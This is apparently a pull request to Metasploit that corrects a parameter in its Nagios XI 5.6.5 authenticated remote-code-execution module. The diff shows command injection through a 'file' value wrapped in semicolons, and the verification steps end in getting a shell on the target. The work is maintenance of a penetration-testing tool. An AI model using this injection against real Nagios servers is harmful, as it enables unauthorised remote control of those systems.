### PR TITLE
Fix up wrong type field in nagios_xi_mibs_authenticated_rce.rb

### DIFF
--- a/modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
@@ -162,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' =>
       {
         'mode' => 'undo-processing',
-        'type' => '2',
+        'type' => '1',
         'file' => ";#{cmd};"
       }
     }, 0) # don't wait for a response from the target, otherwise the module will in most cases hang for a few seconds after executing the payload


### PR DESCRIPTION
So apparently somewhere along the line I made a mistake whilst reviewing `nagios_xi_mibs_authenticated_rce.rb` and ended up setting the `value` field to `2` instead of `1`. After talking with @kalba-security he helpfully pointed out this mistake and the exploit now works wonderfully instead of failing to exploit the target.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/nagios_xi_mibs_authenticated_rce.rb`
- [ ] Set the `RHOSTS`, `LHOST` and `PASSWORD` options appropriately.
- [ ] `exploit`
- [ ] **Verify** that the module now returns a shell when exploiting Ubuntu 18.04 LTS and CentOS 7 with Nagios XI 5.6.5 instead of failing to exploit the target successfully.
